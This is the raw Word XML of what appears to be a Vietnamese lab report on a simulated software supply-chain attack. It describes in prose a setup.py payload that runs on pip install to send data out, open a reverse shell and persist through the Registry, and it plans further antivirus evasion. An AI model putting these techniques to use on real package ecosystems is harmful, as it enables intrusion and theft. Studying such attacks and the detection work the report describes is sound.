        <w:t xml:space="preserve"> Payload ẩn trong dependency của dependency → source code frontend sạch hoàn toàn, lỗ hổng nằm trong setup.py của transitive package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68560AF9" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kịch bản C — Account Takeover:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Chiếm tài khoản registry → đẩy bản cập nhật 1.0.1 giả lên chính server nội bộ hợp lệ → nạn nhân tự cập nhật thành nhiễm độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EFE10D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload hoạt động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58998D75" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Nhúng trong setup.py → kích hoạt khi pip install (không cần user interaction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D4A443" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Thực hiện đồng thời: Data Exfiltration (T1041) qua HTTP POST + Reverse Shell (T1059) + Persistence (T1547) ghi Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AE6141" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">Tỷ lệ bypass AV: </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1/61</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> engine phát hiện (cả raw payload lẫn đã đóng gói)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D5B5F5" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="2B25E301">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB24C74" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(b) Ưu điểm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692BA673" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thực tế cao:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> mô phỏng đúng cơ chế SolarWinds 2020 (build pipeline) và XZ Utils 2024 (trusted contributor), là 2 vụ tấn công supply chain lớn nhất lịch sử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D7F57" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đa vector:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> 3 kịch bản A/B/C bao phủ đầy đủ các hướng tấn công supply chain phổ biến nhất</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172B0639" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stealth tốt:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> bypass 60/61 AV engine, không cần social engineering, không để lại file PE độc hại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A7579" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khép kín:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> có cả Red Team (tấn công) và Blue Team (phát hiện bằng detector.ps1), thể hiện quy trình Incident Response đầy đủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089988B7" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Môi trường tách biệt:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> lab VMware hoàn toàn cô lập, an toàn, có thể tái hiện và dọn sạch sau mỗi lần demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051E7B39" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="67825EA0">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D69E9A8" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(c) Nhược điểm &amp; Hạn chế</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6335DBD3" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phụ thuộc mạng NAT nội bộ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> chưa mô phỏng được kịch bản tấn công qua public registry thực (PyPI, npm) vì rủi ro pháp lý</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243F08FE" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload đơn giản:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> marker.py viết bằng Python thuần — trong thực tế, attacker dùng obfuscation, encryption, polymorphic code để tăng khả năng bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2148BBDC" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chưa có persistence nâng cao:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> chỉ dùng Registry Run key (T1547) — thực tế có thể kết hợp WMI subscription, Scheduled Task, DLL hijacking để bền vững hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5BBA9D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blue Team tool giới hạn:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> detector.ps1 chỉ phát hiện kết nối mạng bất thường — chưa tích hợp memory forensics (Volatility) hay YARA rule để phát hiện sâu hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2013151E" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chưa xét cross-platform:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> chỉ tập trung Windows victim — Linux/macOS cũng là mục tiêu phổ biến của supply chain attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171DF1F3" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="0F7501FC">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D7A6C7" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(d) Hướng phát triển</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562626A3" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nâng payload evasion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> tích hợp obfuscation (base64, string concat), packing (PyInstaller) và anti-sandbox (sleep delay, user interaction check) để tăng tỷ lệ bypass AV từ 1/61 lên 0/61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A52F48" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mở rộng sang npm/Maven/NuGet:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> supply chain attack không chỉ xảy ra với pip Python mà còn cực kỳ nguy hiểm trên các ecosystem Node.js (npm), Java (Maven), .NET (NuGet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C139E7F" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tăng cường Blue Team:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> tích hợp Sigma rule phát hiện hành vi setup.py tạo network connection, kết hợp Volatility phân tích memory dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B4309A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tự động hóa toàn bộ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> xây dựng CI/CD pipeline kiểm tra tự động (Software Composition Analysis — SCA) với pip-audit, OWASP Dependency-Check để cảnh báo trước khi dependency độc lọt vào build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B93BD8" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô phỏng APT thực tế:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> kết hợp supply chain với lateral movement (Cobalt Strike, Mimikatz) để tái hiện hoàn chỉnh chuỗi tấn công APT như SolarWinds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A54DA40" w14:textId="77777777" w:rsidR="00D37A36" w:rsidRDefault="00D37A36"/>
    <w:sectPr w:rsidR="00D37A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F0B18"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B736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464AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD2C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650C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="456C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22816"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2936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42019"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C3C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D57CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="774E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E15235"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03B8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F54C1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A8A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E542C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6AE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6B50E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A64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513968"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="130E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956E4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AEEA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6C614F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B98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A11C5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E732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F002C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A852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A10FE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80E4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F87F8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF60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3F2104"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E8C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7D4780"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9198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122D6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CF4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5E291B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="539A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F55102"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EAFA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23352B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF2A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7F678E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17AE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E81E13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC14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AC13F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="111A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0713F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3458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515E97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07C2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C60EFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B06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056286"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CF30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4756028">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="475606380">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="104926954">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="64114641">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="451481257">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="300888062">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="952902578">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2073887522">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1592932011">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1033505433">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="245891519">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="413625094">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="347558514">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1511064556">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="328561864">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="74133112">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="310183539">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2112578311">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1812861326">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1007823794">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="13920036">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="487330576">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1943488624">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="174803357">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1383942831">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="470371456">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="772750145">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="827326532">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1545943872">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="173928695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A36"/>
    <w:rsid w:val="00283465"/>
    <w:rsid w:val="00451406"/>
    <w:rsid w:val="00C4309E"/>
    <w:rsid w:val="00D37A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3591F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5EBE2AF8-EC15-4344-A127-5848BA79F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7A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7A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7A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7A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7A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7A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A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A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A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A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7A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7A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7A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7A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7A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A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A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A36"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D37A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A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A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A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A36"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00D37A36"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D37A36"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D37A36"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00D37A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7A36"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00D37A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2449</Words>
  <Characters>13963</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>116</Lines>
  <Paragraphs>32</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>16380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Hồng Quân 108.Trần</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hồng Quân 108.Trần</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-18T08:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-18T09:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>